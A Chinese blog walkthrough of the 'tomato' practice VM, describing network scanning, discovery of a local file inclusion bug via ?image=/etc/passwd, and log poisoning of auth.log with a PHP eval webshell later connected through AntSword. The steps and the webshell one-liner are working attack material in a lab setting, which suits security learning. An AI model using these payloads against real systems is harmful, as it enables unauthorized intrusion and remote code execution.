tomato靶机-通关攻略

1、首先确保靶机和kali都是net模式

2、用kali虚拟机扫描同一网段下的所有IP获取靶机的IP

扫到了,接下来我们去访问192.168.19.155

3、打开浏览器访问192.168.19.155

4、扫描这个IP

5、扫到了一条敏感目录,去访问看一下

6、在这些目录里查看一下

首先看到了一个很显眼的文件就是info.php,进去看一下

这两个信息告诉我们可以远程读取文件,但是不允许包含文件

查看一下源代码

查到源代码发现了include这个高危函数,这个函数存在的话就可能存在文件包含漏洞,我们去URL后面输入?image=/etc/passwd,看看会不会显示信息

页面显示信息了,说明确实存在文件包含漏洞

7、回来kali,扫一下网站开启的端口

在网站后面直接跟上木马,尝试写入

<?php @eval($_POST[cmd]);?>

8、这里看到有点问题,我们先抓包看一下

发现我们的尖括号和空格被编码了,我们给它改回去

9、然后放行,再去访问一下日志文件

注:/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录

访问到了日志文件,但是我们也看不懂,我们去尝试去蚁剑测试连接

10、成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值